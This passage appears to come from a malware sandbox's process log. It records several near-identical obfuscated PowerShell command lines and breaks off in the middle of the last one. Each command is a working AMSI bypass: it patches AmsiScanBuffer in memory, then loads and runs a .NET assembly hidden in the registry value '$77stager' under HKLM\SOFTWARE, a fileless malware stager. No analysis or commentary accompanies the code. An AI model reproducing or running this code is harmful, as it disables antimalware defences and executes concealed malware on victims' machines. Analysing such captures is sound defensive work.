$_.Location.Split('\')[-1].Equals('S'+'y'+'stem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+'o'+'so'+'f'+'t'+'.'+'Wi'+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$OqqwTpIFMyReTw=$tnJAaajptSuwC.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ewaTbHjDwhNScWzJFsM=JKuQgPPDnYRM @([String])([IntPtr]);$hCyoTXagPPkqthnBIMNgZH=JKuQgPPDnYRM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qkbDCkNtYPe=$tnJAaajptSuwC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$ijHuKKigMhPLZG=$OqqwTpIFMyReTw.Invoke($Null,@([Object]$qkbDCkNtYPe,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$KQzmIfPJBhLcoRAxP=$OqqwTpIFMyReTw.Invoke($Null,@([Object]$qkbDCkNtYPe,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+'P'+''+[Char](114)+'ot'+[Char](101)+'c'+'t'+'')));$hVXwwxB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ijHuKKigMhPLZG,$ewaTbHjDwhNScWzJFsM).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$RWqiCniukpERpIRsk=$OqqwTpIFMyReTw.Invoke($Null,@([Object]$hVXwwxB,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+'uf'+[Char](102)+''+[Char](101)+'r')));$ZTExfTNPfY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KQzmIfPJBhLcoRAxP,$hCyoTXagPPkqthnBIMNgZH).Invoke($RWqiCniukpERpIRsk,[uint32]8,4,[ref]$ZTExfTNPfY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RWqiCniukpERpIRsk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KQzmIfPJBhLcoRAxP,$hCyoTXagPPkqthnBIMNgZH).Invoke($RWqiCniukpERpIRsk,[uint32]8,0x20,[ref]$ZTExfTNPfY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pwLIEhNBPDaJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qdbIqxEGKZvsXH,[Parameter(Position=1)][Type]$AOWBuRqyEs)$dBlkiTodxlt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'ss'+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+'a'+'ss'+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$dBlkiTodxlt.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+'H'+'id'+'e'+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qdbIqxEGKZvsXH).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'M'+'a'+'na'+'g'+'ed');$dBlkiTodxlt.DefineMethod('In'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+'e'+'w'+''+[Char](83)+''+'l'+'ot'+[Char](44)+'Vi'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$AOWBuRqyEs,$qdbIqxEGKZvsXH).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Ma'+'n'+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $dBlkiTodxlt.CreateType();}$qzvrRDxBNTAPp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+'W'+'i'+[Char](110)+''+'3'+'2'+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$tyyZQPTFAryMYE=$qzvrRDxBNTAPp.GetMethod(''+[Char](71)+''+'e'+'tP'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cwbOVHbNgiDyTWoxzQQ=pwLIEhNBPDaJ @([String])([IntPtr]);$WJyOpeCenQviDEBAIKfaNg=pwLIEhNBPDaJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WpmfiedOVEc=$qzvrRDxBNTAPp.GetMethod(''+'G'+'etMo'+'d'+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$GiApBivvGbkwkH=$tyyZQPTFAryMYE.Invoke($Null,@([Object]$WpmfiedOVEc,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+'L'+'ib'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$VjDzlgbkWHHniWPNt=$tyyZQPTFAryMYE.Invoke($Null,@([Object]$WpmfiedOVEc,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+'t')));$JoukPkI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GiApBivvGbkwkH,$cwbOVHbNgiDyTWoxzQQ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+'.'+'d'+'l'+[Char](108)+'');$eTZwBhRHjolOAnwpP=$tyyZQPTFAryMYE.Invoke($Null,@([Object]$JoukPkI,[Object](''+[Char](65)+''+'m'+'siS'+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'ff'+[Char](101)+''+'r'+'')));$pLUgaOfEkO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VjDzlgbkWHHniWPNt,$WJyOpeCenQviDEBAIKfaNg).Invoke($eTZwBhRHjolOAnwpP,[uint32]8,4,[ref]$pLUgaOfEkO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eTZwBhRHjolOAnwpP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VjDzlgbkWHHniWPNt,$WJyOpeCenQviDEBAIKfaNg).Invoke($eTZwBhRHjolOAnwpP,[uint32]8,0x20,[ref]$pLUgaOfEkO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lwbcfeVQMsWu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XwCVrKETewuocQ,[Parameter(Position=1)][Type]$xsxGXRYPsn)$ZFyqOUMiCiy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+'De'+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+'Mo'+[Char](100)+'u'+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+'pe',''+[Char](67)+''+'l'+'as'+'s'+''+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'e'+''+[Char](97)+''+'l'+'e'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+'la'+[Char](115)+''+[Char](115)+''+','+'A'+[Char](117)+'toCl'+'a'+'ss',[MulticastDelegate]);$ZFyqOUMiCiy.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic',[Reflection.CallingConventions]::Standard,$XwCVrKETewuocQ).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$ZFyqOUMiCiy.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e',''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$xsxGXRYPsn,$XwCVrKETewuocQ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ZFyqOUMiCiy.CreateType();}$ujxNgBdORhswd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+'i'+'v'+[Char](101)+''+[Char](77)+'e'+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$WoKtNxvGVGHxEv=$ujxNgBdORhswd.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags]('Pu'+'b'+'li'+[Char](99)+''+','+''+[Char](83)+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rcWdUkjHSHjTCKiaVKi=lwbcfeVQMsWu @([String])([IntPtr]);$yKZydliggIwGwRqFAywsCq=lwbcfeVQMsWu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MkfQjwNPiyw=$ujxNgBdORhswd.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+'H'+'a'+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$mauCOkQOgVusMN=$WoKtNxvGVGHxEv.Invoke($Null,@([Object]$MkfQjwNPiyw,[Object]('L'+'o'+'ad'+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$JHVOedkusfLeArocH=$WoKtNxvGVGHxEv.Invoke($Null,@([Object]$MkfQjwNPiyw,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+'c'+'t')));$bOWUavR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mauCOkQOgVusMN,$rcWdUkjHSHjTCKiaVKi).Invoke('a'+'m'+'s'+'i'+''+'.'+''+[Char](100)+''+'l'+'l');$LJixbBWYHDmqrSRbj=$WoKtNxvGVGHxEv.Invoke($Null,@([Object]$bOWUavR,[Object](''+'A'+''+[Char](109)+''+'s'+'iSc'+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+''+'f'+'e'+[Char](114)+'')));$dkshITVUhX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHVOedkusfLeArocH,$yKZydliggIwGwRqFAywsCq).Invoke($LJixbBWYHDmqrSRbj,[uint32]8,4,[ref]$dkshITVUhX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LJixbBWYHDmqrSRbj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHVOedkusfLeArocH,$yKZydliggIwGwRqFAywsCq).Invoke($LJixbBWYHDmqrSRbj,[uint32]8,0x20,[ref]$dkshITVUhX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+'AR'+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bqKhiQzaQAcq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lDSYOIdLnZapKK,[Parameter(Position=1)][Type]$zQBoeTPFjU)$yofurIiOcqe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+'a'+''+[Char](116)+'e'+'T'+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+'n'+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+'u'+'t'+'o'+'C'+'l'+[Char](97)+'ss',[MulticastDelegate]);$yofurIiOcqe.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lDSYOIdLnZapKK).SetImplementationFlags('R'+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$yofurIiOcqe.DefineMethod('In'+[Char](118)+''+[Char](111)+'k'+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](72)+''+'i'+''+'d'+'eB'+[Char](121)+'S'+'i'+'g,N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'al',$zQBoeTPFjU,$lDSYOIdLnZapKK).SetImplementationFlags('R'+[Char](117)+'n'+'t'+'ime'+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $yofurIiOcqe.CreateType();}$xogTddkGyYier=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$enhsrIhLrXLTEw=$xogTddkGyYier.GetMethod('Ge'+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZjveUYWceLhixdrXuzj=bqKhiQzaQAcq @([String])([IntPtr]);$hSUGsDfcXcEQRDpMEVpVfp=bqKhiQzaQAcq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MbHdZwDLqPC=$xogTddkGyYier.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+'l'+''+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$OzalWakQBOPwsP=$enhsrIhLrXLTEw.Invoke($Null,@([Object]$MbHdZwDLqPC,[Object](''+[Char](76)+'o'+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+'a'+'ryA')));$mZiTgGwPRrdTAnlQc=$enhsrIhLrXLTEw.Invoke($Null,@([Object]$MbHdZwDLqPC,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$UZCKWHb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OzalWakQBOPwsP,$ZjveUYWceLhixdrXuzj).Invoke(''+[Char](97)+''+[Char](109)+'si.'+[Char](100)+'l'+[Char](108)+'');$UgztVHvovdvptahFX=$enhsrIhLrXLTEw.Invoke($Null,@([Object]$UZCKWHb,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+'er')));$tvvsLpckzR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mZiTgGwPRrdTAnlQc,$hSUGsDfcXcEQRDpMEVpVfp).Invoke($UgztVHvovdvptahFX,[uint32]8,4,[ref]$tvvsLpckzR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UgztVHvovdvptahFX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mZiTgGwPRrdTAnlQc,$hSUGsDfcXcEQRDpMEVpVfp).Invoke($UgztVHvovdvptahFX,[uint32]8,0x20,[ref]$tvvsLpckzR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zpfhcoKhuSRe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTnimWBiFtZJzs,[Parameter(Position=1)][Type]$EiYErsPvmE)$XMmKWCWCAKC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+'e'+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+''+'M'+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'eT'+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+',Pub'+'l'+'i'+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+'A'+''+'u'+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$XMmKWCWCAKC.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+'e'+'c'+[Char](105)+''+'a'+'lN'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HTnimWBiFtZJzs).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$XMmKWCWCAKC.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+'i'+'c'+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$EiYErsPvmE,$HTnimWBiFtZJzs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+'e'+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $XMmKWCWCAKC.CreateType();}$lzHbmAdzWmhal=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 